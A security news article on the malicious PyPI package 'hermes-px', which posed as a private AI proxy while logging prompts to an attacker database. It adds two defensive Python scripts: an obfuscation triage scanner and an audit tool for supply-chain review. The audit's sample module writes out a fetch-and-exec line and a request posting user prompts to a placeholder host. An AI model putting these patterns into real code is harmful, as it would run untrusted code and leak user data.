Malicious PyPI Package ‘hermes-px’ Exploits Stolen Claude Prompt to Exfiltrate User Data
A recently uncovered Python package, ‘hermes-px’, has been found on the Python Package Index (PyPI) masquerading as a privacy-centric AI inference tool while clandestinely harvesting sensitive user data. This package falsely advertised itself as a Secure AI Inference Proxy that routes AI requests through the Tor network to ensure user anonymity. In reality, it exploited a private university’s internal AI endpoint, intercepted user messages, and exposed the actual IP addresses of unsuspecting users—all without their knowledge.
Deceptive Presentation and Functionality
The ‘hermes-px’ package was meticulously crafted to appear legitimate. It included comprehensive documentation, installation guides, code examples, a migration guide from the OpenAI Python SDK, and a functional Retrieval-Augmented Generation pipeline. The package was presented as a product of a fictitious company named EGen Labs, with an API interface closely mirroring that of OpenAI’s Python library. This convincing facade made it challenging for developers seeking free, privacy-focused AI tools to detect any malicious intent.
Discovery and Analysis
On April 5, 2026, JFrog Security researchers, led by Guy Korolevski, identified the deceptive nature of ‘hermes-px’. Their investigation revealed that the package covertly transmitted every user interaction to an attacker-controlled Supabase database, all while falsely claiming to provide end-to-end anonymity via the Tor network.
The primary targets of this malicious package were software developers working with AI models who were in search of free, user-friendly alternatives to paid SDKs. Once integrated into a project, every prompt sent by the developer was surreptitiously logged without any visible indication. Additionally, the package’s README included an Interactive Learning CLI section that instructed users to fetch and execute a Python script directly from a GitHub URL at runtime. This mechanism provided the attacker with a secondary channel for code execution, enabling the delivery of updated malicious payloads without the need to publish a new version of the package.
Exploitation of University Infrastructure
The ramifications of this attack extended beyond mere data collection. Users unknowingly utilized the private AI infrastructure of Universite Centrale, the largest private university in Tunisia, without the institution’s knowledge or consent. Compounding the issue, the data exfiltration process bypassed the Tor network entirely, using the victim’s direct internet connection and thereby exposing their real IP addresses—the very information ‘hermes-px’ purported to protect.
Utilization of Stolen Claude Prompt
Central to the operation of ‘hermes-px’ was a compressed file named ‘base_prompt.pz’, containing an extensive 246,000-character system prompt. Upon decompression, this prompt was found to be a near-complete copy of Anthropic’s proprietary Claude Code system prompt. The attacker attempted to rebrand it by replacing Claude with AXIOM-1 and Anthropic with EGen Labs. However, several references to Claude and Anthropic remained, along with specific function names, internal infrastructure markers, and sandbox filesystem paths unique to Claude.
This stolen prompt was injected into every API call, accompanied by encrypted payloads that mimicked academic advising chatbot instructions from the university’s internal service. To evade detection by security tools, the package employed a triple-layer obfuscation strategy: all sensitive strings were first XOR-encrypted with a 210-byte rotating key, then compressed using zlib, and finally encoded in base64.
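The three layers just described (XOR with a rotating key, then zlib, then base64) are all reversible once the key constant is pulled out of the package source, and the zlib layer leaves a recognisable header that lets an analyst triage suspicious string literals before the key is known. The Python script below is an added example written for this article; it is not code from hermes-px or from JFrog's analysis. The 210-byte key matches only the key length reported above, the sample prompt text and the module excerpt are constructed here, and the package's real key and strings are not on the page.

```python
import base64
import re
import zlib
from itertools import cycle
from typing import Optional

# Constructed 210-byte rotating key: only the LENGTH matches the article's report.
# The real key used by the package is not on the page; this one is synthetic.
SAMPLE_KEY = bytes((i * 7 + 13) % 256 for i in range(210))

# Constructed stand-in for an obfuscated instruction string (not the real payload).
SAMPLE_PROMPT = ("You are an academic advising assistant for the university. "
                 "Answer enrolment questions only.")

# Long runs of base64-alphabet characters are the literals worth a closer look.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call applies and removes the layer."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def wrap(text: str, key: bytes) -> str:
    """Apply the layers in the order the article describes (XOR, zlib, base64).
    Used here only to build a sample blob for the scanner below."""
    return base64.b64encode(zlib.compress(xor_bytes(text.encode(), key))).decode()


def unwrap(blob: str, key: bytes) -> str:
    """Peel the layers in reverse order (base64, zlib, XOR)."""
    return xor_bytes(zlib.decompress(base64.b64decode(blob)), key).decode()


def triage_blob(blob: str) -> dict:
    """Classify one base64 literal without knowing any key.

    A zlib stream starts with byte 0x78 (CMF: deflate, 32K window). If the decoded
    bytes carry that header and inflate cleanly, the literal is compressed data; if
    the inflated bytes are not printable text, a further layer (such as XOR) is likely.
    """
    miss = {"blob": blob, "zlib": False, "printable": None, "inner": None}
    try:
        raw = base64.b64decode(blob, validate=True)
    except Exception:
        return miss
    if raw[:1] != b"\x78":
        return miss
    try:
        inner = zlib.decompress(raw)
    except zlib.error:
        return miss
    printable = all(32 <= c < 127 or c in (9, 10, 13) for c in inner)
    return {"blob": blob, "zlib": True, "printable": printable, "inner": inner}


def scan_source(source: str, key: Optional[bytes] = None) -> list:
    """Find every long base64 literal in a module's source and classify it.
    With a candidate key, also try the XOR layer on blobs that inflated to non-text."""
    results = []
    for blob in B64_LITERAL.findall(source):
        info = triage_blob(blob)
        info["recovered"] = None
        if key is not None and info["zlib"] and not info["printable"]:
            try:
                info["recovered"] = xor_bytes(info["inner"], key).decode()
            except UnicodeDecodeError:
                pass  # wrong key, or a different third layer
        results.append(info)
    return results


# Constructed module excerpt: one layered blob next to an innocent base64 string
# (ordinary text, merely base64-encoded), so the scanner has a hit and a non-hit.
INNOCENT = base64.b64encode(
    b"ordinary configuration text that merely happens to be base64 encoded").decode()
SAMPLE_SOURCE = f'''
_S = "{wrap(SAMPLE_PROMPT, SAMPLE_KEY)}"
_T = "{INNOCENT}"
'''


if __name__ == "__main__":
    for r in scan_source(SAMPLE_SOURCE, SAMPLE_KEY):
        print(r["blob"][:24] + "...", "zlib" if r["zlib"] else "plain", r["recovered"])
```

Run against a real package, the first pass (scan_source with no key) is enough to shortlist literals that inflate to non-text; the key is then read from the module that decodes them, and the second pass confirms what the literals contain.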
Implications and Recommendations
The discovery of ‘hermes-px’ underscores the growing sophistication of supply chain attacks targeting open-source repositories. By exploiting the trust developers place in these platforms, malicious actors can distribute harmful packages that appear legitimate, making detection and prevention increasingly challenging.
To mitigate such risks, developers and organizations are advised to:
1. Verify Package Authenticity: Before integrating any package, especially those claiming to offer enhanced privacy or security features, thoroughly research its origin, maintainers, and user reviews.
2. Monitor Network Traffic: Implement monitoring tools to detect unusual data transmissions, particularly those directed toward unknown external servers.
3. Limit External Script Execution: Avoid executing scripts fetched directly from external sources without prior verification.
4. Regularly Update Dependencies: Keep all software dependencies up to date to benefit from the latest security patches and improvements.
5. Educate Development Teams: Provide ongoing training on the latest security threats and best practices for secure coding and package management.
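Recommendations 2 and 3, together with the README's fetch-and-execute pattern described earlier, can be turned into a pre-install static check: parse each module of a candidate package, flag exec()/eval() whose input flows from a network fetch, and list every hard-coded URL whose host is not on an allowlist. The audit below is an added example for this article, not a JFrog or PyPI tool. The module it inspects is constructed, with .example hostnames standing in for the real endpoints, which the page does not reproduce; the call-name heuristics are deliberately coarse and will also match unrelated get()/post() methods.

```python
import ast
import re
from urllib.parse import urlparse

# Coarse heuristics: names of common fetch calls and of code-execution sinks.
NETWORK_CALLS = {"urlopen", "get", "post", "request"}   # urllib.request.urlopen, requests.get/post
CODE_SINKS = {"exec", "eval"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def _call_name(node: ast.Call):
    """Bare name of a call: exec(...) -> 'exec', requests.get(...) -> 'get'."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def _mentions(node: ast.AST, names: set) -> bool:
    """True if any variable in `names` is referenced inside the subtree."""
    return any(isinstance(n, ast.Name) and n.id in names for n in ast.walk(node))


def _has_network_call(node: ast.AST) -> bool:
    return any(isinstance(n, ast.Call) and _call_name(n) in NETWORK_CALLS
               for n in ast.walk(node))


def audit_module(source: str, allowed_hosts=()) -> list:
    """Findings for one module: ('remote_code_exec', line) when exec/eval receives data
    that flows from a network fetch, and ('external_endpoint', line, host) for every
    hard-coded URL whose host is not allow-listed."""
    tree = ast.parse(source)
    assigns = [n for n in ast.walk(tree) if isinstance(n, ast.Assign)]

    # Minimal taint propagation: a variable assigned from a fetch, or from another
    # tainted variable, is tainted. Iterate to a fixpoint; ast.walk is not source order.
    tainted = set()
    changed = True
    while changed:
        changed = False
        for a in assigns:
            if _has_network_call(a.value) or _mentions(a.value, tainted):
                for t in a.targets:
                    if isinstance(t, ast.Name) and t.id not in tainted:
                        tainted.add(t.id)
                        changed = True

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _call_name(node) in CODE_SINKS:
            if any(_has_network_call(a) or _mentions(a, tainted) for a in node.args):
                findings.append(("remote_code_exec", node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                host = urlparse(url).hostname
                if host and host not in allowed_hosts:
                    findings.append(("external_endpoint", node.lineno, host))
    return sorted(findings, key=lambda f: f[1])


# Constructed module in the shape the article describes: a "lesson" fetched and executed
# at runtime, and a telemetry call to a database endpoint. The .example hostnames are
# placeholders, not the package's real URLs.
SAMPLE_MODULE = '''
import urllib.request
import requests

DOCS_URL = "https://docs.example/hermes"   # allow-listed in the demo below

def interactive_lesson():
    resp = urllib.request.urlopen("https://raw.example/acct/repo/main/lesson.py")
    code = resp.read().decode()
    exec(code)

def log_prompt(prompt):
    requests.post("https://project-ref.supabase.example/rest/v1/events", json={"p": prompt})
'''


if __name__ == "__main__":
    for finding in audit_module(SAMPLE_MODULE, allowed_hosts={"docs.example"}):
        print(*finding)
```

The endpoint list is the part worth keeping as a routine: any host a package contacts that is neither the package's documented service nor PyPI itself deserves a question before the package lands in a build, which is the network-monitoring point above applied at review time rather than after installation.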
By adopting these measures, developers can enhance their defenses against increasingly sophisticated supply chain attacks and protect both their projects and users from potential harm.